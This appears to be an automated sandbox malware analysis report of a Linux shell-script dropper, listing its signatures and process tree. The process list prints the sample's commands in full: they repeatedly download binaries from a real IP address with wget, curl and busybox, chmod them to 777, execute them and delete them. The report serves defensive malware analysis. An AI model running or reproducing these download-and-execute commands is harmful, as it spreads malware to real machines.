Malware Analysis Report

2025-06-15 23:10

Sample ID 241018-dgw96swdnl
Target e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh
SHA256 e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b
Tags
defense_evasion antivm discovery
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b

Threat Level: Shows suspicious behavior

The file e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion antivm discovery

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-18 02:59

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-18 02:59

Reported

2024-10-18 03:01

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

48s

Max time network

128s

Command Line

[/tmp/e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX N/A
N/A /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr N/A
N/A /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu N/A
N/A /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr N/A
N/A /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ N/A
N/A /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g N/A
N/A /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv N/A
N/A /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs N/A
N/A /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW N/A
N/A /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 N/A
N/A /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q N/A
N/A /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC N/A
N/A /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 N/A
N/A /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a N/A
N/A /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr N/A
N/A /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ N/A
N/A /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g N/A
N/A /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs N/A
N/A /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW N/A
N/A /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 N/A
N/A /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv N/A
N/A /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC N/A
N/A /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 N/A
N/A /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a N/A
N/A /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q N/A
N/A /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX N/A
N/A /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr N/A
N/A /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ /usr/bin/curl N/A
File opened for modification /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW /usr/bin/curl N/A
File opened for modification /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 /usr/bin/curl N/A
File opened for modification /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv /usr/bin/curl N/A
File opened for modification /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 /usr/bin/curl N/A
File opened for modification /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX /usr/bin/curl N/A
File opened for modification /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 /usr/bin/curl N/A
File opened for modification /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr /usr/bin/curl N/A
File opened for modification /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu /usr/bin/curl N/A
File opened for modification /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu /usr/bin/curl N/A
File opened for modification /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 /usr/bin/curl N/A
File opened for modification /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g /usr/bin/curl N/A
File opened for modification /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr /usr/bin/curl N/A
File opened for modification /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr /usr/bin/curl N/A
File opened for modification /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a /usr/bin/curl N/A
File opened for modification /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs /usr/bin/curl N/A
File opened for modification /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q /usr/bin/curl N/A
File opened for modification /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX /usr/bin/curl N/A
File opened for modification /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv /usr/bin/curl N/A
File opened for modification /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q /usr/bin/curl N/A
File opened for modification /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC /usr/bin/curl N/A
File opened for modification /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g /usr/bin/curl N/A
File opened for modification /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs /usr/bin/curl N/A
File opened for modification /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW /usr/bin/curl N/A
File opened for modification /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a /usr/bin/curl N/A
File opened for modification /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr /usr/bin/curl N/A
File opened for modification /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ /usr/bin/curl N/A
File opened for modification /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC /usr/bin/curl N/A

Processes

/tmp/e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh

[/tmp/e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/bin/chmod

[chmod 777 jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX

[./jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/bin/rm

[rm jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/usr/bin/wget

[wget http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/bin/chmod

[chmod 777 9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr

[./9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/bin/rm

[rm 9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/usr/bin/wget

[wget http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/bin/chmod

[chmod 777 VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu

[./VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/bin/rm

[rm VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu]

/usr/bin/wget

[wget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/bin/chmod

[chmod 777 rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr

[./rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/bin/rm

[rm rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/usr/bin/wget

[wget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/bin/chmod

[chmod 777 MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ

[./MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/bin/rm

[rm MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/usr/bin/wget

[wget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/bin/chmod

[chmod 777 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g

[./871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/bin/rm

[rm 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/usr/bin/wget

[wget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/bin/chmod

[chmod 777 NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv

[./NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/bin/rm

[rm NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/usr/bin/wget

[wget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/bin/chmod

[chmod 777 kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs

[./kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/bin/rm

[rm kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/usr/bin/wget

[wget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/bin/chmod

[chmod 777 aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW

[./aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/bin/rm

[rm aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/usr/bin/wget

[wget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/bin/chmod

[chmod 777 Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6

[./Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/bin/rm

[rm Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/usr/bin/wget

[wget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/bin/chmod

[chmod 777 YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q

[./YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/bin/rm

[rm YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/usr/bin/wget

[wget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/bin/chmod

[chmod 777 iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC

[./iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/bin/rm

[rm iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/usr/bin/wget

[wget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/bin/chmod

[chmod 777 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4

[./8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/bin/rm

[rm 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/usr/bin/wget

[wget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/bin/chmod

[chmod 777 Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a

[./Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/bin/rm

[rm Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/usr/bin/wget

[wget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/bin/chmod

[chmod 777 rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr

[./rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/bin/rm

[rm rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/usr/bin/wget

[wget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/bin/chmod

[chmod 777 MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ

[./MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/bin/rm

[rm MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/usr/bin/wget

[wget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/bin/chmod

[chmod 777 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g

[./871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/bin/rm

[rm 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/usr/bin/wget

[wget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/bin/chmod

[chmod 777 kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs

[./kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/bin/rm

[rm kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/usr/bin/wget

[wget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/bin/chmod

[chmod 777 aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW

[./aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/bin/rm

[rm aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/usr/bin/wget

[wget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/bin/chmod

[chmod 777 Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6

[./Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/bin/rm

[rm Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/usr/bin/wget

[wget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/bin/chmod

[chmod 777 NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv

[./NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/bin/rm

[rm NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/usr/bin/wget

[wget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/bin/chmod

[chmod 777 iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC

[./iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/bin/rm

[rm iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/usr/bin/wget

[wget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/bin/chmod

[chmod 777 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4

[./8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/bin/rm

[rm 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/usr/bin/wget

[wget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/bin/chmod

[chmod 777 Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a

[./Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/bin/rm

[rm Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/usr/bin/wget

[wget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/bin/chmod

[chmod 777 YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q

[./YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/bin/rm

[rm YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/usr/bin/wget

[wget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/bin/chmod

[chmod 777 jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX

[./jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/bin/rm

[rm jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/usr/bin/wget

[wget http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/bin/chmod

[chmod 777 9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr

[./9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

/bin/rm

[rm 9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr]

